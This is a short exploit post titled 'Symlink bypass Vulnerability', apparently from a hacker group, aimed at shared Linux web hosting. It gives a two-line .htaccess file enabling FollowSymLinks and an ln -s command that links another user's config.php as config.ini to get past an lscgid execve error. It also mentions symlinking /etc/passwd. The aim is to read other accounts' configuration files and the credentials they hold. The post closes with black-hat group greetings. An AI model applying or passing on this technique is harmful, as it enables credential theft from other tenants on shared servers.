Skip to main content

[ShellCode] - Symlink bypass Vulnerability

#############################################
mail : ehsan.empire1@gmail.com
#(+) Exploit Title: symlink bypass vulnerability
#(+) Author       : 3H34N
#(+) E-mail       : Ehsan.Empire@Att.Net
#(+) Platform     : Tested on: linux

############################################
symlink bypass with ini method
when you symlink /etc/passwd and you can read it
but symlink /home/user/public_html/config.php opposite with error :
lscgid : execve() :/home/[patch]/public_html/
now you make a .htaccess file in current directory and copy this contain in it:

then symlink with this command:

ln -s /home/user/public_html/config.php config.ini

you see bypassed error execve() :/home/[patch]/public_html/ and can
you read config.ini
########################################################################

.htaccess file:

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm

########################################################################
(+)IRANIAN Young HackerZ # Persian Gulf
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & D3adly #BHG
(+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~
Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~  S3Ri0uS and
all Friends
(+)Gr33ts to : All Iranian HackerZ
########################################################################

Share this with your friends
Loading...